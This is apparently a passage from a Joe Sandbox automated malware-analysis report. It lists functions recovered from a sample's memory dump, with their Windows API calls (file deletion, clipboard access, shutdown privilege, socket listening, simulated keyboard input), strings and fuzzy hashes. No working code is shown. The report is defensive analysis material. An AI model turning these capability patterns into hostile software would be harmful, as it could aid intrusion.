                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A931B8: GetFullPathNameW.KERNEL32(00000000,00000104,?,?), ref: 00A931DA
                                                                                                                                                          • Part of subcall function 00AD7C0C: GetFileAttributesW.KERNEL32(?,00AD6A7B), ref: 00AD7C0D
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6E7E
                                                                                                                                                        • __wsplitpath.LIBCMT ref: 00AD6E99
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00AD6EAE
                                                                                                                                                        • _wcscpy.LIBCMT ref: 00AD6EDD
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6EEF
                                                                                                                                                        • _wcscat.LIBCMT ref: 00AD6F01
                                                                                                                                                        • DeleteFileW.KERNEL32(?), ref: 00AD6F0E
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,00000010), ref: 00AD6F22
                                                                                                                                                        • FindClose.KERNEL32(00000000), ref: 00AD6F3D
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: File$Find_wcscat$AttributesCloseDeleteFirstFullNameNextPath__wsplitpath_wcscpy
                                                                                                                                                        • String ID: \*.*
                                                                                                                                                        • API String ID: 2643075503-1173974218
                                                                                                                                                        • Opcode ID: 7a24ef3bb3db3e8a39114de30fceb95004af9ce44df42cc2851efeba9516e5d5
                                                                                                                                                        • Instruction ID: 15b48c53930a1b954a087b231504f4b589ab9228447fdd67d57ac1024e6f865d
                                                                                                                                                        • Opcode Fuzzy Hash: 7a24ef3bb3db3e8a39114de30fceb95004af9ce44df42cc2851efeba9516e5d5
                                                                                                                                                        • Instruction Fuzzy Hash: D321BF72409384AAC610EBA098849DBBBEC9B99314F444E1BF5D5C3152EB34D60D87A2
                                                                                                                                                        Function 00AE7294 Relevance: 15.1, APIs: 10, Instructions: 83clipboardmemoryCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1737998785-0
                                                                                                                                                        • Opcode ID: 029788d6c41efdd375ecd322ace8c054e5fc57f01891da80250943bafa432319
                                                                                                                                                        • Instruction ID: 9c30609ba24ee1f31221277024618338d60315d870c1a2a044e5ac371205b05e
                                                                                                                                                        • Opcode Fuzzy Hash: 029788d6c41efdd375ecd322ace8c054e5fc57f01891da80250943bafa432319
                                                                                                                                                        • Instruction Fuzzy Hash: 9021AE31704212AFDB10AF65DD59BAE7BA8EF44721F44801AF90ADB2A1DF74ED409B90
                                                                                                                                                        Function 00AE24A9 Relevance: 12.4, APIs: 6, Strings: 1, Instructions: 119filesleepCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00A9CAEE: _memmove.LIBCMT ref: 00A9CB2F
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 00AE24F6
                                                                                                                                                        • Sleep.KERNEL32(0000000A,?,00000000,00000000), ref: 00AE2526
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE253A
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00AE2555
                                                                                                                                                        • FindNextFileW.KERNEL32(?,?,?,00000000,00000000), ref: 00AE25F3
                                                                                                                                                        • FindClose.KERNEL32(00000000,?,00000000,00000000), ref: 00AE2609
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                                                                                                                        • String ID: *.*
                                                                                                                                                        • API String ID: 713712311-438819550
                                                                                                                                                        • Opcode ID: e9cc39894a901f82ae0c2f344a158046d535ebe41a5594b05ce7de131bcb7459
                                                                                                                                                        • Instruction ID: 91514228ed72caecc0bad43c342b34c438d53d78cd16fb66df0075fb2c522243
                                                                                                                                                        • Opcode Fuzzy Hash: e9cc39894a901f82ae0c2f344a158046d535ebe41a5594b05ce7de131bcb7459
                                                                                                                                                        • Instruction Fuzzy Hash: 9F417B7190025AAFCF21DFA5CD59BEEBBB8FF04310F244456E815A2191EB349A94CBA0
                                                                                                                                                        Function 00A98530 Relevance: 11.0, APIs: 7, Instructions: 531COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4104443479-0
                                                                                                                                                        • Opcode ID: c416b18ac5e47f03571529a1cf824a55304c902a381e5f5797db705f0ef55226
                                                                                                                                                        • Instruction ID: a568cd564808ca3891e66195fa6ce8470af11f12e46b171ab80dec3bef141391
                                                                                                                                                        • Opcode Fuzzy Hash: c416b18ac5e47f03571529a1cf824a55304c902a381e5f5797db705f0ef55226
                                                                                                                                                        • Instruction Fuzzy Hash: F3129B70A00609DFDF14DFA4DA85AAEB7F5FF48300F208569E806E7291EB35AE15CB50
                                                                                                                                                        Function 00AFEAA6 Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 149nativewindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AAAF7D: GetWindowLongW.USER32(?,000000EB), ref: 00AAAF8E
                                                                                                                                                          • Part of subcall function 00AAB736: GetCursorPos.USER32(000000FF), ref: 00AAB749
                                                                                                                                                          • Part of subcall function 00AAB736: ScreenToClient.USER32(00000000,000000FF), ref: 00AAB766
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000001), ref: 00AAB78B
                                                                                                                                                          • Part of subcall function 00AAB736: GetAsyncKeyState.USER32(00000002), ref: 00AAB799
                                                                                                                                                        • ReleaseCapture.USER32 ref: 00AFEB1A
                                                                                                                                                        • SetWindowTextW.USER32(?,00000000), ref: 00AFEBC2
                                                                                                                                                        • SendMessageW.USER32(?,000000B1,00000000,000000FF), ref: 00AFEBD5
                                                                                                                                                        • NtdllDialogWndProc_W.NTDLL(?,00000202,?,?,00000000,00000001,?,?,?), ref: 00AFECAE
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AsyncStateWindow$CaptureClientCursorDialogLongMessageNtdllProc_ReleaseScreenSendText
                                                                                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DROPID
                                                                                                                                                        • API String ID: 973565025-2107944366
                                                                                                                                                        • Opcode ID: ace4171b0a9c3fe1b9edd9ecae75db788c1b6e93696018317193cb07951815e4
                                                                                                                                                        • Instruction ID: 79b25d5cb36aa1c2f0fc1b4f76312639df006380a1c8fe4f3d670efcf49d05ae
                                                                                                                                                        • Opcode Fuzzy Hash: ace4171b0a9c3fe1b9edd9ecae75db788c1b6e93696018317193cb07951815e4
                                                                                                                                                        • Instruction Fuzzy Hash: DF51CD71204304AFD710EF64CD96FAA7BE5FB88744F40491CF6859B2E2CB709905CB62
                                                                                                                                                        Function 00AD82D0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 58shutdownCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00ACBEC3: LookupPrivilegeValueW.ADVAPI32(00000000,00000000,00000004), ref: 00ACBF0F
                                                                                                                                                          • Part of subcall function 00ACBEC3: AdjustTokenPrivileges.ADVAPI32(?,00000000,00000000,?,00000000,?), ref: 00ACBF3C
                                                                                                                                                          • Part of subcall function 00ACBEC3: GetLastError.KERNEL32 ref: 00ACBF49
                                                                                                                                                        • ExitWindowsEx.USER32(?,00000000), ref: 00AD830C
                                                                                                                                                        Strings
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: AdjustErrorExitLastLookupPrivilegePrivilegesTokenValueWindows
                                                                                                                                                        • String ID: $@$SeShutdownPrivilege
                                                                                                                                                        • API String ID: 2234035333-194228
                                                                                                                                                        • Opcode ID: 2fbf35832192d6e869988537637b4e76e5703ac36ddaf36dc25585a6114492b8
                                                                                                                                                        • Instruction ID: 59feba3855613717be339bbe3f55665d5ca5fc3af73b2c9637a7064caf5c8426
                                                                                                                                                        • Opcode Fuzzy Hash: 2fbf35832192d6e869988537637b4e76e5703ac36ddaf36dc25585a6114492b8
                                                                                                                                                        • Instruction Fuzzy Hash: 8301A271B50315ABE768277C8C5BFFB7268AB05F80F140826F957EA2D2DE689C0081A4
                                                                                                                                                        Function 00AE91DC Relevance: 9.1, APIs: 6, Instructions: 83networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • socket.WSOCK32(00000002,00000001,00000006,?,00000002,00000000), ref: 00AE9235
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9244
                                                                                                                                                        • bind.WS2_32(00000000,?,00000010), ref: 00AE9260
                                                                                                                                                        • listen.WS2_32(00000000,00000005), ref: 00AE926F
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000), ref: 00AE9289
                                                                                                                                                        • closesocket.WS2_32(00000000), ref: 00AE929D
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLast$bindclosesocketlistensocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1279440585-0
                                                                                                                                                        • Opcode ID: 3c8ea3868673a28173930aff5b04ff8ccf6dc49b8a1a6f24fd776d083540a678
                                                                                                                                                        • Instruction ID: 23824a676cadbd376b7fa6643dfa0c4602b0506ecf427cd048e644a6f5f7ce3a
                                                                                                                                                        • Opcode Fuzzy Hash: 3c8ea3868673a28173930aff5b04ff8ccf6dc49b8a1a6f24fd776d083540a678
                                                                                                                                                        • Instruction Fuzzy Hash: A8218B35600600AFCB10EF68CA85BAEB7E9AF84324F108159FA56AB3D1CB74AD41CB51
                                                                                                                                                        Function 00A9A0C0 Relevance: 8.0, APIs: 5, Instructions: 514COMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AB010A: std::exception::exception.LIBCMT ref: 00AB013E
                                                                                                                                                          • Part of subcall function 00AB010A: __CxxThrowException@8.LIBCMT ref: 00AB0153
                                                                                                                                                        • _memmove.LIBCMT ref: 00B03020
                                                                                                                                                        • _memmove.LIBCMT ref: 00B03135
                                                                                                                                                        • _memmove.LIBCMT ref: 00B031DC
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 1300846289-0
                                                                                                                                                        • Opcode ID: 64135f0a1ed64c28566e460a16adac637cd567b6381d227ecae9bbb22be7e09a
                                                                                                                                                        • Instruction ID: 80e736e9c2e9e9b79c5b0359fb402f6d97b7a8010ed1bb6264a4d7c7d2392cb5
                                                                                                                                                        • Opcode Fuzzy Hash: 64135f0a1ed64c28566e460a16adac637cd567b6381d227ecae9bbb22be7e09a
                                                                                                                                                        • Instruction Fuzzy Hash: 57029370A00205DFCF04DF68D985AAE7BF9EF59340F1480AAE806DB295EB31DE55CB91
                                                                                                                                                        Function 00AE96E2 Relevance: 7.6, APIs: 5, Instructions: 146networkCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                          • Part of subcall function 00AEACD3: inet_addr.WS2_32(00000000), ref: 00AEACF5
                                                                                                                                                        • socket.WSOCK32(00000002,00000002,00000011,?,?,?,00000000), ref: 00AE973D
                                                                                                                                                        • WSAGetLastError.WS2_32(00000000,00000000), ref: 00AE9760
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: ErrorLastinet_addrsocket
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 4170576061-0
                                                                                                                                                        • Opcode ID: 1536ca21f6629bbe116c055f8bb57f3118fc5a47dedf8fcfaee35a6451e331a0
                                                                                                                                                        • Instruction ID: bdf8ab3a8073fa0ac72c4edd6d14a1fe2d5650c904eb99d59b8a77a18f62fc97
                                                                                                                                                        • Opcode Fuzzy Hash: 1536ca21f6629bbe116c055f8bb57f3118fc5a47dedf8fcfaee35a6451e331a0
                                                                                                                                                        • Instruction Fuzzy Hash: 8841E374A00200AFDB10AF28CE82E6E77EDEF49324F148458F956AB3D2CB749D418B91
                                                                                                                                                        Function 00ADF350 Relevance: 7.6, APIs: 5, Instructions: 125fileCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • FindFirstFileW.KERNEL32(?,?), ref: 00ADF37A
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADF3AA
                                                                                                                                                        • _wcscmp.LIBCMT ref: 00ADF3BF
                                                                                                                                                        • FindNextFileW.KERNEL32(00000000,?), ref: 00ADF3D0
                                                                                                                                                        • FindClose.KERNEL32(00000000,00000001,00000000), ref: 00ADF3FE
                                                                                                                                                        Memory Dump Source
                                                                                                                                                        • Source File: 00000002.00000002.2556267789.0000000000A91000.00000040.00000001.01000000.00000005.sdmp, Offset: 00A90000, based on PE: true
                                                                                                                                                        • Associated: 00000002.00000002.2556079693.0000000000A90000.00000002.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B3E000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000B4A000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000BAE000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2556267789.0000000000C36000.00000040.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2557854930.0000000000C3C000.00000080.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C3D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C44000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C7D000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        • Associated: 00000002.00000002.2558018346.0000000000C93000.00000004.00000001.01000000.00000005.sdmpDownload File
                                                                                                                                                        Joe Sandbox IDA Plugin
                                                                                                                                                        • Snapshot File: hcaresult_2_2_a90000_UNK_.jbxd
                                                                                                                                                        Similarity
                                                                                                                                                        • API ID: Find$File_wcscmp$CloseFirstNext
                                                                                                                                                        • String ID:
                                                                                                                                                        • API String ID: 2387731787-0
                                                                                                                                                        • Opcode ID: 002ae121503a678bef98fb0f8917599cf04097d3c070d1556ad904de3e519115
                                                                                                                                                        • Instruction ID: 1c3c2c5c6d7236464aa7c6a7ab4d17f029aa046d9167ab69ac81c120d210134e
                                                                                                                                                        • Opcode Fuzzy Hash: 002ae121503a678bef98fb0f8917599cf04097d3c070d1556ad904de3e519115
                                                                                                                                                        • Instruction Fuzzy Hash: CF419D756047029FCB08DF28C490E9AB3E8FF49324F10456EE96ACB3A1DB31A945CB91
                                                                                                                                                        Function 00AD4342 Relevance: 6.1, APIs: 4, Instructions: 112keyboardwindowCOMMON
                                                                                                                                                        Download Yara Rule
                                                                                                                                                        APIs
                                                                                                                                                        • GetKeyboardState.USER32(?,00000000,?,00000001), ref: 00AD439C
                                                                                                                                                        • SetKeyboardState.USER32(00000080,?,00000001), ref: 00AD43B8
                                                                                                                                                        • PostMessageW.USER32(00000000,00000102,?,00000001), ref: 00AD4425
                                                                                                                                                        • SendInput.USER32(00000001,?,0000001C,00000000,?,00000001), ref: 00AD4483
                                                                                                                                                        Memory Dump Source
